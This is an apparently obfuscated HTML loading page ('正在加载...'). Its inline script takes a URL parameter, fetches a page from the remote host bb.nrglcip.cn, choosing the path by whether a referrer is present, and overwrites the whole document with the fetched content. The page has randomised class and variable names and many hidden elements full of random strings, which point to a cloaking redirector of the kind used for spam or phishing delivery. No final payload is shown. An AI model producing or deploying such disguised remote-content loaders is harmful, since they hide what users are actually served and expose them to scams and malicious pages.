<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .o59B3R {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .o59B3R .SiYMuaP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .o59B3R .content {
            line-height: 50px;
            text-align: center
        }

        .o59B3R .img {
            width: 100%
        }

        .o59B3R .qJwucvc4FPE {
            text-align: center
        }

        .o59B3R .qJwucvc4FPE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .o59B3R .qJwucvc4FPE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .o59B3R .qJwucvc4FPE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .o59B3R .qJwucvc4FPE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .o59B3R .qJwucvc4FPE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .o59B3R .qJwucvc4FPE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .o59B3R .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CX8IXzflW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jIGIl = CX8IXzflW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jIGIl +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jIGIl +".html?a=share";
		}
		
        FSDHuWQjY8=url+"#"+new Date().getTime();
        FSDHuWQjY8 && function() {
            $.get(FSDHuWQjY8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >v55s0XlfIjDMozotugax9da1mAzloXbSfN6YDqvKOaBVxwzPAWFVk2tKh4LLV2ZrFSn</li>
<b style='display:none' >q58epacxmBuNfEeXD5Ifn93udP7dwlxM4GPDpkl</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >q58epacxmBuNfEeXD5Ifn93udP7dwlxM4GPDpkl</b>
<li style='display:none' >v55s0XlfIjDMozotugax9da1mAzloXbSfN6YDqvKOaBVxwzPAWFVk2tKh4LLV2ZrFSn</li>
<b style='display:none' >q58epacxmBuNfEeXD5Ifn93udP7dwlxM4GPDpkl</b>
<div style='display:none'>l0ZIGV3ErkO9aSjhBg206ppVjuX7G9mvY4xAWse3qLC9BaiCkB9kCTqswIEFJHzT6U2gNe7nQbHF14rBrfLv7A6dWkrN7JrqN</div>
<h1 style='display:none' >hnMfu9TteSJSnmScU2PcfZU7eKq7RDc8zMRz8Yxifq3214YmIq2QNubBIwZnOJnGhpzLFdIoNuiZGslZPHZAjTi00JYukv5TTDDWs</h1>
<li style='display:none' >v55s0XlfIjDMozotugax9da1mAzloXbSfN6YDqvKOaBVxwzPAWFVk2tKh4LLV2ZrFSn</li><div class="o59B3R">
    <div class="SiYMuaP">
        <div class="qJwucvc4FPE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >yfZWKgEvPBDjdvP3xTjmFYVFkhwzblpKob804j</b>
<p  style='display:none'>teSj4P7Gg6HRAMEn91P8bHR00LCXZJRIll5u9e1NEgijUbvg4AVtzg6P7PUcJDNdtYkUJFKhhYB</p>
<b style='display:none' >yfZWKgEvPBDjdvP3xTjmFYVFkhwzblpKob804j</b>
<li style='display:none' >VFMMwujbTx0Ud3K9</li>
<div style='display:none'>TyWts4qGEv3LwmaOr8LrZiDDga8eGAkvZtjH0</div>
<p  style='display:none'>teSj4P7Gg6HRAMEn91P8bHR00LCXZJRIll5u9e1NEgijUbvg4AVtzg6P7PUcJDNdtYkUJFKhhYB</p></body>
</html>